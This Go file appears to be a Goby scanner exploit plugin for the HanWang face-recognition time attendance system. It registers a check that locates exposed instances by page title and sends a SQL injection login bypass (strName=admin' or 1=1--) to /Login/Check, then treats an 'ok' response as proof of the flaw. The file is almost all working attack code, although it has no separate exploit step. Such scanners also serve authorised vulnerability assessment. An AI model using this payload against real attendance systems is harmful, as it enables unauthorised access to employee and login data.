package exploits import ( "fmt" "git.gobies.org/goby/goscanner/goutils" "git.gobies.org/goby/goscanner/jsonvul" "git.gobies.org/goby/goscanner/scanconfig" "git.gobies.org/goby/httpclient" "strings" ) func init() { expJson := `{ "Name": "HanWang Time Attendance SQL injection", "Description": "HanWang Time Attendance SQL injection", "Product": "HanWang Time Attendance", "Homepage": "https://www.hw99.com/", "DisclosureDate": "2021-05-19", "Author": "PeiQi", "GobyQuery": "title=\"汉王人脸考勤管理系统\"", "Level": "2", "Impact": "SQL injection", "Recommendation": "", "References": [ "http://wiki.peiqi.tech" ], "HasExp": false, "ExpParams": null, "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "data": "", "data_type": "text", "follow_redirect": true, "method": "GET", "uri": "/" }, "ResponseTest": { "checks": [ { "bz": "", "operation": "==", "type": "item", "value": "200", "variable": "$code" } ], "operation": "AND", "type": "group" } } ], "ExploitSteps": null, "Tags": ["SQL injection"], "CVEIDs": null, "CVSSScore": "0.0", "AttackSurfaces": { "Application": ["HanWang Time Attendance"], "Support": null, "Service": null, "System": null, "Hardware": null } }` ExpManager.AddExploit(NewExploit( goutils.GetFileName(), expJson, func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { uri := "/Login/Check" cfg := httpclient.NewPostRequestConfig(uri) cfg.VerifyTls = false cfg.FollowRedirect = false cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") cfg.Data = "strName=admin' or 1=1--&strPwd=admin" if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "ok") } return false }, func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { return expResult }, )) }